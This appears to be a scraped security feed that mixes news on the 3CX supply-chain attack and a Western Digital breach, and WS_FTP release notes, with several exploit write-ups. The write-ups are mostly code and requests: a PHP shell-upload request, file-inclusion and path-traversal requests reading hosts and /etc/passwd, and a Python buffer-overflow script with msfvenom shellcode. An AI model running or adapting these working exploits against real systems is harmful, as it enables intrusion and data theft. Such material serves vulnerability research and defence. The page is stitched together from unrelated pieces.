"Gopuram" is a backdoor that North Korea's Lazarus Group has used in some campaigns dating back to 2020, some researchers say.

The threat actor — believed to be the Lazarus Group — that recently compromised 3CX's VoIP desktop application to distribute information-stealing software to the company's customers has also dropped a second-stage backdoor on systems belonging to a small number of them.

The backdoor, called "Gopuram," contains multiple modules that the threat actors can use to exfiltrate data; install additional malware; start, stop, and delete services; and interact directly with victim systems. Researchers from Kaspersky spotted the malware on a handful of systems running compromised versions of 3CX DesktopApp.

Meanwhile, some security researchers now say that their analysis shows the threat actors may have exploited a 10-year-old Windows vulnerability (CVE-2013-3900).

**Gopuram: Known Backdoor Linked to Lazarus**

Kaspersky identified Gopuram as a backdoor it has been tracking since at least 2020 when the company found it installed on a system belonging to a cryptocurrency company in Southeast Asia. The researchers at that time found the backdoor installed on a system alongside another backdoor called AppleJeus, attributed to North Korea's prolific Lazarus Group.

In a blog post on April 3, Kaspersky concluded that the attack on 3CX was, therefore, also very likely the work of the same outfit. "The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence," Kaspersky said.

Kaspersky researcher Georgy Kucherin says the purpose of the backdoor is to conduct cyber espionage. "Gopuram is a second-stage payload dropped by the attackers" to spy on target organizations, he says.

Kaspersky's discovery of second-stage malware adds another wrinkle to the attack on 3CX, a provider of videoconferencing, PBX, and business communication app for Windows, macOS, and Linux systems. The company has claimed that some 600,000 organizations worldwide — with more than 12 million daily users — currently use its 3CX DesktopApp.

**A Major Supply Chain Compromise**

On March 30, 3CX CEO Nick Galea and CISO Pierre Jourdan confirmed that attackers had compromised certain Windows and macOS versions of the software to distribute malware. The disclosure came after several security vendors reported observing suspicious activity associated with legitimate, signed updates of the 3CX DesktopApp binary.

Their investigations showed that a threat actor — now identified as the Lazarus Group — had compromised two dynamic link libraries (DLLs) in the application's installation package added malicious code to them. The weaponized apps ended on user systems via automatic updates from 3CX and also via manual updates.

Once on a system, the signed 3CX DesktopApp executes the malicious installer, which then initiates a series of steps that ends with an information-stealing malware getting installed on the compromised system. Multiple security researchers have noted that only an attacker with a high level of access to 3CX's development or build environment would have been able to introduce malicious code to the DLLs and get away unnoticed. 

3CX has hired Mandiant to investigate the incident and has said it will release more details of what exactly transpired once it has all the details.

**Attackers Exploited a 10-Year-Old Windows Flaw**

Lazarus Group also apparently used a 10-year-old bug to add malicious code to a Microsoft DLL without invalidating the signature. 

In its 2103 vulnerability disclosure, Microsoft had described the flaw as giving attackers a way to add malicious code to a signed executable without invalidating the signature. The company's update for the issue changed how binaries signed with Windows Authenticode are verified. Basically, the update ensured that if someone made changes to an already signed binary, Windows would no longer recognize the binary as signed.

In announcing the update back then, Microsoft also made it an opt-in update, meaning users didn't have to apply the update if they had concerns about the stricter signature verification causing problems in situations where they might have made custom changes to installers. 

"Microsoft was reluctant, for a time, to make this patch official," says Jon Clay, vice president of threat intelligence at Trend Micro. "What is being abused by this vulnerability, in essence, is a scratch-pad space at the end of the file. Think of it like a cookie flag that many applications have been allowed to use, like some Internet browsers."

Brigid O’Gorman, senior intelligence analyst with Symantec's Threat Hunter team, says the company's researchers did see the 3CX attackers appending data to the end of a signed Microsoft DLL. "It worth noting that what gets added to the file is encrypted data that needs something else to turn it into malicious code," O'Gorman says. In this case, the 3CX application sideloads the ffmpeg.dll file, which reads the data appended to the end of the file and then decrypts it into code that calls out to an external command-and-control (C2) server, she notes.

“I think the best advice for organizations at the moment would be to apply Microsoft's patch for CVE-2013-3900 if they have not already done so," O'Gorman says.

Notably, organizations that might have patched the vulnerability when Microsoft first issued an update for it would need to do so again if they have Windows 11. That's because the newer OS undid the effect of the patch, Kucherin and other researchers say.

"CVE-2013-3900 was used by the second-stage DLL in an attempt to hide from security applications that only check against a digital signature for validity," Clay says. Patching would help security products flag the file for analysis, he notes.

William Dormann, senior vulnerability analyst at Analygence says the attackers in the 3CX incident used CVE-2013-3900 to plant shellcode in a digitally signed binary and banked on the malware slipping past analysts because it was digitally signed. "Users who have applied the mitigation for CVE-2013-3900 would not have been protected in any way whatsoever against the 3CX malware on an otherwise default configuration of Windows," he says. No Windows platform includes a fix for CVE-2013-3900 at this point in time. It remains strictly optional. He also notes that with GitHub taking down the payload files attackers had stored on it, there's nothing more users can do to protect against the threat.

A Microsoft spokesman said an attacker would be able to add code to a signed DLL only if they had already compromised the code via a third-party. "As a best practice, we encourage customers to apply all the latest security updates for better protection," the spokesman said. 

"In addition, Defender for Endpoint and Microsoft Defender antivirus can detect and block the domains and files involved with this threat," the spokesman added. Microsoft did not directly address a Dark Reading question on why the company had decided to make the fix for CVE-2013-3900. Instead, the spokesman pointed to Microsoft's original security advisory on the bug. "Regarding CVE-2013-3900 updates specifically, we recommend customers assess their system environment and follow the steps and suggested actions outlined in the security advisory," the spokesman said.

_This story was updated on 04/04 to include comments from Microsoft and analyst Will Dormann._

3CX Breach Widens as Cyberattackers Drop Second-Stage Backdoor

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

GLPI Activity Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Manageentities Local File Inclusion

SQL Monitor version 12.1.31.893 suffers from a cross site scripting vulnerability.

    # Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC]# Exploit Author: [geeklinuxman@gmail.com]# Vendor Homepage: [https://www.red-gate.com/]# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]# Version: [SQL Monitor 12.1.31.893]# Tested on: [Windows OS]# CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl inhttps://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker tohijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious AHTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.

SQL Monitor 12.1.31.893 Cross Site Scripting

Grand Theft Auto III with Vice City Skin File version 1.1 suffers from a buffer overflow vulnerability.

    # Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow # Exploit Date: 22.01.2023# Discovered and Written by: Knursoft# Vendor Homepage: https://www.rockstargames.com/# Version: v1.1# Tested on: Windows XP SP2/SP3, 7, 10 21H2# CVE : N/A#1 - Run this python script to generate "evil.bmp" file.#2 - Copy it to [Your Game Path]\skins.#3 - Launch the game and navigate to Options > Player Setup and choose skin"evil".#4 - Buffer Overflow occurs and calc.exe pops up!#msfvenom -p windows/exec CMD="calc.exe"buf =  b""buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65"buf += b"\x00"#any shellcode should work, as it seems there is no badcharsver = 0 #set to 1 if you want it to work on GTA III steam versionesp = b"\xb9\xc5\x14\x21" #mss32.dll jmp espbmphdr =b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"#generic bmp headerpayload = bmphdrpayload += b"\x90" * 1026if ver == 1:    payload += b"\x90" * 112payload += esppayload += b"\x90" * 20 #paddingpayload += bufwith open("evil.bmp", "wb") as poc:    poc.write(payload)

Grand Theft Auto III Vice City Skin File 1.1 Buffer Overflow

ManageEngine Access Manager Plus version 4.3.0 suffers from a path traversal vulnerability.

    ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal## Author: nu11secur1ty## Date: 11.22.2023## Vendor: https://www.manageengine.com/## Software: https://www.manageengine.com/privileged-session-management/download.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)## Description:The `pmpcc` cookie is vulnerable to path traversal attacks, enablingread access to arbitrary files on the server.The testing payload..././..././..././..././..././..././..././..././..././..././etc/passwdwas submitted in the pmpcc cookie.The requested file was returned in the application's response.The attacker easy can see all the JS structures of the server and canperform very dangerous actions.## STATUS: HIGH Vulnerability[+] Exploits:```GETGET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1Host: localhost:9292Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Mobile: ?0X-Requested-With: XMLHttpRequestSec-CH-UA-Platform: WindowsReferer: https://localhost:9292/AMPHome.html```[+] Response:```,'js.pmp.helpCertRequest.subcontent10':'The issued certificate ise-mailed to the user who raises the request, the user who closes therequest and also to those e-mail ids specified at the time of closingthe request.','js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username','js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Nextsynchronization is scheduled to run on','js.agent.csharp_Windows_Agent':'C# Windows Agent','js.PassTrixMainTab.in_sec':'Seconds','godaddy.importcsr.selectfileorpastecontent':'Either select a file orpaste the CSR content.','js.connection.colors':'Colors','js.general.ShareToGroups':'Share resource to user groups','js.connection.mapdisk':'Drives','jsp.admin.Support.User_Forums':'User Forums','js.general.CreateResource.Dns_url_check':'Enter a valid URL . Forcloud services (Rackspace and AWS IAM), the DNS name <br>looks like aURL (ex:  https:\/\/identity.api.rackspacecloud.com\/v2.0)','js.admin.RPA_Integration.About':'PAM360 renders bots that seamlesslyintegrate and perfectly fit into the pre-designed and automatedintegrations of the below listed RPA-powered platforms, to simulatethe routine manual password retrieval from the PAM360 vault.','js.discovery.loadhostnamefromfile':'From file','js.AddListenerDetails.Please_enter_valid_implementation_class':'Pleaseenter a valid Implementation Class','js.general.GroupedResources':'Grouped Resources','js.general.SlaveServer':'This operation is not permitted in Secondary Server.','PROCESSID':'Process Id','js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Servicesfetched successfully','assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled','js.commonstr.search':'Search','js.discovery.usercredential_type':'Credential Type','jsp.admin.GeneralSetting.Check_high_availability_status_for':'Checkhigh availability status every <input type=\"text\" class=\"txtbox\"name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"> minutes.','pki.js.help.entervalidnumber':'Please enter a valid number forNumeric Field Default Value.','js.remoteapp.fetch':'Fetch','js.admin.HighAvailability.configured_successfully':'Configured Successfully','js.generalSettings_searchTerm_Password_reset':'Password Reset,Reason for password reset, disable ticket id, waiting time, wait timefor service account password reset, linux unix password reset','letsencrypt.enter.domainnames':'Enter domain names','js.discovery.resourcetype':'Resource Type','js.HomeTab.UserTab':'Set this tab as default view for \'Users\'','js.report.timeline.todate':'Valid To','js.general_Language_Changed_Successfully':'Language Changed Successfully','js.aws.credentials.label':'AWS Credential','auditpurge.helpnote1':'Enter 0 or leave the field blank to disablepurging of audit trails.','js.general.user.orgn_bulkManage':'Manage Organization','js.rolename.SSH_KEY':'Create\/Add key','js.admin.admin.singledbmultiserver.name':'Application Scaling','lets.encrypt.requestreport':'Let\'s Encrypt Requests Report','js.settings.breach_settings.disable_api':'Disable API Access','js.cmd.delete.not_possible':'Command cannot be deleted as it isalready added to the following command set(s).','js.settings.notification.domaincontent':'Notify if domains areexpiring within','js.aws.searchuser':'--Search UserName--','jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketingsystem settings in Admin >> General >> Ticketing System Integration.','js.discovery.port':'Gateway Port','usermanagement.showCertificates':'Show Certificates','js.general.DestinationDirectoryCannotBeEmpty':'Destination directorycannot be empty','js.sshreport.title':'SSH Resource Report','js.encryptionkey.update':'Update','js.aws.regions':'Region','js.settingsTitle1.UserManagement':'User Management','js.passwordPolicy.setRange':'Enforce minimum or maximum password length','js.commonstr.selectResources':'Select Resources','RULENAME':'Rule Name','jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'UserGroup added successfully','js.reports.SSHReports.title':'SSH Reports','js.CommonStr.ValueIsLess':'value is less than 2','js.discovery.discoverystatus':'Discovery Status','js.settings.security_settings.Web_Access':'Web Access','js.general.node_name_cannot_be_empty':'Node name cannot be empty','js.deploy.audit':'Deploy Audit','js.agentdiscovery.msca.title':'Microsoft Certificate Authority','jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominateuser group(s) to exempt from access control.','js.pki.SelectCertificateGroup':'Select Certificate Group(s)','js.admin.HighAvailability.High_Availability_status':'Status','settings.metracker.note0':'Disable ME Tracker if you do not wish toallow ManageEngine to collect product usage details.','SERVICENAME':'Service Name','settings.metracker.note1':'Access Manager Plus server has to berestarted for the changes to take effect.','js.general.NewPinMismatch':'New PIN Mismatch','js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'','java.ScheduleUtil.minutes':'minutes','js.admin.sdpop_change.tooltip':'Enabling this option will requireyour users to provide valid Change IDs for the validation of passwordaccess requests and other similar operations. Leaving this optionunchecked requires the users to submit valid Request IDs forvalidation.','js.privacy_settings.title.redact':'Redact','js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25resources can be selected','js.aboutpage.websitetitle':'Website','js.customize.NumericField':'Numeric Field','js.please.select.file':'Please select a file to upload.','js.AutoLogon.Remote_connections':'Remote Connections','pki.snmp.port':'Port','java.dashboardutils.TODAY':'TODAY','js.schedule.starttime':'Start Time','js.ssh.keypassphrase':'Passphrase','js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus','js.analytics.tab.ueba.msg4':'guide','js.analytics.tab.ueba.msg5':'to complete the integration. For anyfurther questions, please write to us atpam360-support@manageengine.com.','js.reportType.Option7.UserAuditReport':'Audit Report','js.common.csr':'CSR','js.globalsign.reissue.order':'Reissue Order','js.analytics.tab.ueba.msg6':'Build a platform of expected behaviorfor individual users and entities by mapping different user accounts','js.analytics.tab.ueba.msg7':'Verify actionable reports thatsymbolize compromise with details about actual behavior and expectedbehavior.','js.resources.importcredential':'Import Credentials','js.analytics.tab.ueba.msg1':'The Advanced Analytics module forPAM360, offered via ManageEngine Log360 UEBA, analyzes logs fromdifferent sources, including firewalls, routers, workstations,databases, file servers and cloud services. Any deviation from normalbehavior is classified as a time, count, or pattern anomaly. It thengives actionable insight to the IT Administrator with the use of riskscores, anomaly trends, and intuitive reports.','js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:','js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360instance, download Log360 UEBA from the below link and follow theinstructions in this','js.settingsTitle2.MailServer':'Mail Server','jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'ManagingAMP Encryption Key','settings.unmappedmails.email':'E-mail Address','amp.connection.connection_type':'Connection Type','js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior basedon activity time, count, and pattern.','godaddy.contactphone':'Contact Phone','js.general.HelpDeskIntegrate.ClassSameException':'Class name alreadyimplemented. Implement with some other class.','js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors inWindows devices, SQL servers, FTP servers, and network devices such asrouters, firewalls, and switches.','js.rolename.freeCA.acme':'ACME','digicert.label.dcv.cname':'CNAME Token','js.helpcontent.createuser':'User Creation ','pgpkeys.key.details':'Key Information','js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status','js.HomeTab.TaskAuditView':'Task Audit','pki.js.certs.certGroupsSharedByUserGroups':'Certificate GroupsShared With User Group(s)','js.common.importcsr.format':'(File format should be .csr)','js.notificationpolicy.Submit':'Save','pmp.vct.User_Audit_Configuration':'User Audit Configuration'.........```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))## Reference:[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)## Proof and Exploit:[href](https://streamable.com/scdzsb)## Time spent`03:00:00`

ManageEngine Access Manager Plus 4.3.0 Path Traversal

A heap-based overflow vulnerability in Trellix Agent (Windows and Linux) version 5.7.8 and earlier, allows a remote user to alter the page heap in the macmnsvc process memory block resulting in the service becoming unavailable.

CVE-2023-0977

By Waqas
The cyberattack has forced the technology giant to shut down and take some of its operations offline.
This is a post from HackRead.com Read the original post: Western Digital Security Breach – Hackers infiltrate Internal Systems

The Western Digital security breach appears to have been linked to ransomware, but so far, no major ransomware group has claimed responsibility for the attack.

On March 26, 2023, data storage company Western Digital suffered a “network security incident” where hackers managed to access several of its internal systems, confirmed the California-based firm.

The breach appears to have been linked to ransomware, although Western Digital has not revealed how it was compromised. The company is currently working to determine the nature and extent of the data that was stolen by the hackers.

So far, the perpetrators remain unknown and no major ransomware group has claimed responsibility for the attack.

It’s not surprising that Western Digital has experienced another security breach, given that in 2021, hackers were able to remotely wipe the hard drives of Western Digital My Book Live.

In a statement, Western Digital said that “Based on the investigation to date, the company believes the unauthorized party obtained certain data from its systems and is working to understand the nature and scope of that data.”

Western Digital stated that the incident caused disruption to its business operations and downed its My Cloud network-attached storage service, which enables users to access their files over the internet.

According to the company, it is taking proactive measures to secure its business operations, which include taking some systems and services offline. The company is also taking additional steps as necessary to prevent further security breaches.

The company assured customers that it is implementing security measures to prevent future cyber attacks and is also working to restore the affected infrastructure and services.

Western Digital is working with a cybersecurity firm whose name has not been revealed, and coordinating with law enforcement to investigate the breach.

The data breach at Western Digital highlights the continuing threat of cyber attacks to companies and their customers. It is a timely reminder for organizations to take proactive measures to secure their networks and protect sensitive data.

1.  Don’t Sell Your Laptop Without Following These Steps
2.  UCLA researcher destroyed hard drive amid FBI probe
3.  Sonic & Ultra signals crash Windows, Linux & hard drives
4.  Hard drives with data of 29K Facebook employees stolen
5.  Ex-employee stole hard drive with Coca-Cola workers’ data

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Western Digital Security Breach – Hackers infiltrate Internal Systems

Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

**2020.0..0 (8.7.0) Dec 15, 2020**

**2020.0.1 (8.7.1) Aug 30, 2021** **(updated)**

**2020.0.2 (8.7.2) April 22, 2022** **(updated)**

**2020.0.3 (8.7.3) Aug 1, 2022** **(updated)**

The WS\_FTP Server 2020.0.0 (8.7.0) release focused on security vulnerabilities and customer issues to ensure that all security updates were applied to provide users with a secure and quality product.

The following are the main security enhancements and bug fix highlights that were applied to the 2020 release:

*   Database passwords containing special characters are accepted
*   Updated third party components to versions that address known security vulnerabilities.
*   Log viewer filters are applied to exported log data
*   Email addresses of users with a top level domain longer than 5 characters are accepted by WS\_FTP Server
*   The WS\_FTP Server admin log on page renders correctly
*   The installation documentation was updated to include the following important information:  
    _Installing WS\_FTP Server on a domain controller is not supported_

For details of all of the fixed vulnerabilities and issues, see Fixed Issues.

The WS\_FTP Server UI and documentation were rebranded as _Progress WS\_FTP Server._

Support for WS\_FTP Web Server will be deprecated in future releases.

**Fixed Issues in 2020.0.0 (8.7.0)**

The following issues were fixed in WS\_FTP Server 2020.0.0 (8.7.0).

ID

Category

Fixed Issue

6007

Documentation

The installation documentation was updated to include the following important information:  
_Installing WS\_FTP Server on a domain controller is not supported._

6208, 6219, 6222, 6256

Install, SSH, Database

There is support for special characters in database passwords during installation and database configuration.

6301

Security

The AngularJS version used for the WTM and AHT modules was upgraded to version 1.8 to prevent vulnerabilities.

6302

Security

WS\_FTP Server's cookies now have secure and HTTP only attributes.

6325

Security

The prototype.js version used in WS\_FTP Server was upgraded to version 1.7.3 to prevent vulnerabilities.

6342, 6345, 6346

Security,  
WTM

Fixed a directory traversal vulnerability on WS\_FTP Server's WTM interface.

6348

Logging Server

Filters that were applied to the log viewer are now also applied to the .XML export option.

6350

Users

Email addresses of users with a top level domain longer than 5 characters are now accepted by WS\_FTP Server.

6351

Web Admin

The WS\_FTP Server admin log on and home pages now render correctly.

6352

Security,  
Server Admin

Updates were applied to the LogServer login page to protect against cross site scripting (xss).

6356

Security

Error messages were sanitized to prevent the disclosure of potentially sensitive data.

6383

Security

The FTP server (and SSH server) do not reveal the product version to unauthenticated users.

6419

Core

Sessions time out after the specified time, the default is 600 seconds, or when a client disconnects.

**Fixed Issues in 2020.0.1 (8.7.1)**

The following issues were fixed in WS\_FTP Server 2020.0.1 (8.7.1).

ID

Category

Fixed Issue

12244

Database

Fixed an issue which caused an error connecting to SSH/FTP after database migration from PostgreSQL to MSSQL.

12769

Web Transfer Module

Web Transfer Module now successfully opens as part of application pool creation.

**Fixed Issues in 2020.0.2 (8.7.2)**

The following issues were fixed in WS\_FTP Server 2020.0.2 (8.7.2).

ID

Category

Fixed Issue

12339

SRVR/Security

The PostgreSQL version used in WS\_FTP Server was upgraded from version 10.14 to 10.20 to prevent vulnerabilities.

**Fixed Issues in 2020.0.3 (8.7.3)**

The following issues were fixed in WS\_FTP Server 2020.0.3 (8.7.3).

ID

Category

Fixed Issue

6315, 6332, 12240, 15175, 15178, 15179, 15184, 15185

Server, Security

Addressed Cross-Site Request Forgery (CSRF) issues in WS\_FTP Server Administrative interface.

15168, 15181, 15182, 15183, 15186, 15187, 15188

Server, Security

Addressed cross-site scripting (XSS) issues in WS\_FTP Server Administrative interface.

**Known Issues**

This section details known issues and workarounds in all WS\_FTP Server 2020.0 (8.7) releases.

ID

Category

Known Issue Description

15343

Install

A repair installation issue with WS\_FTP Server 2020.0.0 or later, prevents users from upgrading to the next available version.

**Note**: This issue only affects all WS\_FTP Server 2020 releases (2020.0.0, 2020.0.1, and 2020.0.2) where a repair has been applied to an upgraded installation.  
For upgrade information and next steps, see this knowledge base article.

**System Requirements**

These requirements apply to the supporting environment and operating system where you install WS\_FTP Server.

**Software Requirements**

**Supported Operating Systems for WS\_FTP Server**

The Operating Systems are supported for the following WS\_FTP Server configurations:

*   Standalone
*   Failover cluster using Microsoft Clustering Services
*   Failover cluster using Microsoft Network Load Balancing

**Operating System**

*   Windows Server 2019 Standard/Datacenter (standalone only)
*   Windows Server 2016 Standard/Datacenter (standalone only)
*   Windows Server 2012 R2 Standard/Datacenter (standalone only)

**Windows Server Components Activated Automatically**

The WS\_FTP Server installer automatically activates certain components in your Windows Server installation. This is necessary because after installation Windows Server does not turn on non-core operating system components. However, before installing WS\_FTP Server, you should ensure these changes conform to your organization’s security policies.

When you install WS\_FTP Server, the install activates the following Windows Server roles:

*   ISAPI Extensions
*   Windows Authentication
*   ASP

**Supported Web Browsers**

The following browsers are supported for WS\_FTP Server Manager and the Web Transfer and Ad-Hoc Transfer client interfaces:

*   Chrome
*   Mozilla Firefox
*   Microsoft Edge

**Database Platform**

